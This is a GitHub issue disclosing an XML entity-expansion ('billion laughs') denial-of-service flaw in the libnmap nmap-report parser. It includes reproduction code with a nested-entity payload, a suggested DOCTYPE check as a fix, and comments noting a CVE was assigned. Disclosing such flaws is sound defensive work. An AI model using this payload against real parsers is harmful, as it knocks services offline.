Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XML Injection DoS attack #87

prodigysml opened this issue Feb 1, 2018 · 2 comments


Copy link

commented Feb 1, 2018


Libnmap is vulnerable to XML Bomb attacks using the following:

Where the Issue Occurred

The issue occurs within parsing of XML reports for nmap. The exact line where the vulnerable parsing occurs is given below:

root = ET.fromstring(nmap_data)

Reproduction steps

Run the following code:

ty = NmapParser()

payload = """
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">



Python does not contain any fixes for this vulnerability, but that doesn't mean it can't be fixed. Searching for the word DOCTYPE, prior to parsing, and raising an exception should patch the issue.


This comment has been minimized.

Copy link

commented Jul 15, 2019

This apparently was assigned CVE-2019-1010017.


This comment has been minimized.

Copy link

commented Jul 15, 2019

It seems there has been somework on XML bomb attacks in the past. Maybe it's best to update here and get it fixed?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
3 participants
You can’t perform that action at this time.